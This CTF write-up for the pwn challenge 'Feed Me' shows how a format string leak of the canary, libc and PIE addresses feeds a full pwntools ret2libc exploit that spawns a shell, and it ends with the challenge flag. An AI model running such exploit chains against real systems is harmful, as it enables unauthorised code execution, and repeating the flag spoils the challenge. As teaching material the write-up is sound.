CSC2023 - [Pwn] - Feed Me
Challenge Description
I don't have control on myself. Sometimes I can control, otherwise I can't.
Solution
First of all, we check the protections on the binary.
All protections are enabled 😡
Let us run the binary
There is a format string vulnerability.
We need to find the libc base in order to get a shell. The loop below sends "%i$p" for each stack slot so we can see what every position leaks:
from pwn import *
context.log_level = 'error'
elf = context.binary = ELF('./feedmepwn')
# Leak one stack slot per run: "AAAAAAAA" is a marker so we can spot
# where our own input sits on the stack, %{i}$p prints slot i as a pointer
for i in range(1, 50):
    io = process()
    payload = f"AAAAAAAA.%{i}$p"
    io.sendline(payload.encode())
    io.sendline(b'dasfsaf')   # second input the program waits for
    print(io.recvall(), i)
    io.close()
As a tip, the leaked values can be recognised by their shape:
0x7f... - libc
0x7ff... - stack
0x5... - PIE (binary)
8-byte value ending in 00 - canary
Libc Base
Use xinfo <address> in pwndbg on the leaked libc address and it tells you the offset of that address from the libc base.
Here the offset is 0x29d90.
Subtracting this offset from the address leaked by %27$p gives our libc base.
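The rules of thumb from the tip and the base computation above, as an added helper that is not part of the original writeup: it parses the output lines of the "%i$p" loop, labels each leak, and derives a base from a leak and a known offset, refusing values that are not page aligned (a sign of a wrong offset or wrong stack slot). The sample output lines and the libc/exe offsets used in the demo are constructed for illustration.

```python
import re

# Constructed sample output of the "%i$p" loop, keyed by stack slot (not real values)
SAMPLE_LEAKS = {
    22: "AAAAAAAA.(nil)",
    23: "AAAAAAAA.0x1a2b3c4d5e6f7800",
    25: "AAAAAAAA.0x7f3c2a4a1d90",
    27: "AAAAAAAA.0x5581c8f251c9",
    30: "AAAAAAAA.0x7ffd11223344",
}

def parse_leak(line):
    """Extract the %p value after the 'AAAAAAAA.' marker; None for '(nil)'."""
    m = re.search(r"\.(0x[0-9a-fA-F]+)", line)
    return int(m.group(1), 16) if m else None

def classify(value):
    """Apply the writeup's rules of thumb to one leaked 64-bit value."""
    if value is None:
        return "null"
    h = f"{value:#x}"
    # 8 bytes whose lowest byte is 00 (and a non-zero top byte): stack canary.
    # A heuristic only; a libc pointer can also end in 00.
    if value & 0xff == 0 and value >> 56:
        return "canary"
    if h.startswith("0x7ff"):      # stack addresses live at 0x7ff...
        return "stack"
    if h.startswith("0x7f"):       # other 0x7f... values are mapped libraries
        return "libc"
    if h.startswith("0x5"):        # PIE binary mapped at 0x55.../0x56...
        return "pie"
    return "unknown"

def classify_all(leaks):
    """Map stack slot -> label for a dict of loop output lines."""
    return {slot: classify(parse_leak(line)) for slot, line in leaks.items()}

def base_from_leak(leak, offset):
    """Base = leak - offset (offset from pwndbg's xinfo); bases are page aligned."""
    base = leak - offset
    if base & 0xfff:
        raise ValueError(f"{base:#x} is not page aligned: wrong offset or wrong slot")
    return base

if __name__ == "__main__":
    for slot, label in classify_all(SAMPLE_LEAKS).items():
        print(f"%{slot}$p -> {label}")
    print(f"libc base = {base_from_leak(parse_leak(SAMPLE_LEAKS[25]), 0x29d90):#x}")
```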
Final Script 🔥
#!/usr/bin/env python3
from pwn import *
context.update(os="linux", arch="amd64")
r = process("./feedmepwn")
libc = ELF("./libc.so.6", checksec=False)
# Stack slots found with the %i$p loop:
# 23 is canary
# 25 leaks libc_base+171408
# 27 leaks exe_base+4553
payload = b"%23$p.%25$p.%27$p"
log.info(f"Sending payload: {payload.decode()}")
r.sendline(payload)
# The program echoes our input after " - "; the three leaks are dot-separated
leak = r.recvline().decode().rstrip().split(" - ")[1]
canary, libc_leak, exe_leak = leak.split(".")
canary = int(canary, 16)
libc_leak = int(libc_leak, 16)
exe_leak = int(exe_leak, 16)
libc_base = libc_leak - 0x29d90   # 0x29d90 == 171408
exe_base = exe_leak - 0x11c9      # 0x11c9 == 4553
log.success("Got leaks!")
log.info(f"\tcanary = {hex(canary)}")
log.info(f"\tlibc_base = {hex(libc_base)}")
log.info(f"\texe_base = {hex(exe_base)}")
libc.address = libc_base          # rebase libc symbols to the leaked base
libc_rop = ROP(libc)
BINSH = next(libc.search(b"/bin/sh"))
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
POP_RDI = libc_rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libc_rop.find_gadget(['ret'])[0]
offset_to_canary = 136            # bytes from the buffer start to the canary
payload = b""
payload += b"A" * offset_to_canary
payload += p64(canary)            # keep the canary intact
payload += p64(0)                 # saved rbp
payload += p64(ret)               # align the stack before calling system
payload += p64(POP_RDI)
payload += p64(BINSH)
payload += p64(SYSTEM)
payload += p64(EXIT)
# Alternative payload returning to a single libc gadget; not sent below
payload1 = cyclic(136) + pack(canary) + pack(0) + pack(libc_base+0xf1f2f)
log.info("Sending ret2libc payload!")
r.sendline(payload)
log.success("Enjoy your shell :)")
r.interactive()
Flag
CSC{G00d_C0mb1n4ti0n_0f_f0rm4t_Str1ngs_4nd_Buff3r_Ov3rfl0w}
Writeups 2023 © RootxRAN.